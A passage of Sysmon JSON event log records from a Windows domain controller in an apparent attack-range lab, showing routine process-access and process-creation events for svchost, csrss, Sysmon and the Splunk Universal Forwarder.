C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3771,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3772,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-0010D59A0500}\r\nTargetProcessId: 4792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010D59A0500}","TargetProcessId":"4792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3773,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.886\r\nSourceProcessGUID: {E2A3D6B1-1105-5F25-0000-0010D59A0500}\r\nSourceProcessId: 4792\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.886","SourceProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010D59A0500}","SourceProcessId":"4792","SourceThreadId":"1148","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3774,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.937\r\nProcessGuid: {E2A3D6B1-1105-5F25-0000-0010639E0500}\r\nProcessId: 4376\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd\" check-transforms-keys\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nParentProcessId: 3828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.937","ProcessGuid":"{E2A3D6B1-1105-5F25-0000-0010639E0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd\" check-transforms-keys","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","ParentProcessId":"3828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3775,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.933\r\nSourceProcessGUID: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nSourceProcessId: 3828\r\nSourceThreadId: 3824\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-0010639E0500}\r\nTargetProcessId: 4376\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18226|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.933","SourceProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","SourceProcessId":"3828","SourceThreadId":"3824","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010639E0500}","TargetProcessId":"4376","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18226|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3776,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.933\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-0010639E0500}\r\nTargetProcessId: 4376\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.933","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010639E0500}","TargetProcessId":"4376","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3777,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.933\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.933","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3778,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.933\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.933","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3779,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.933\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 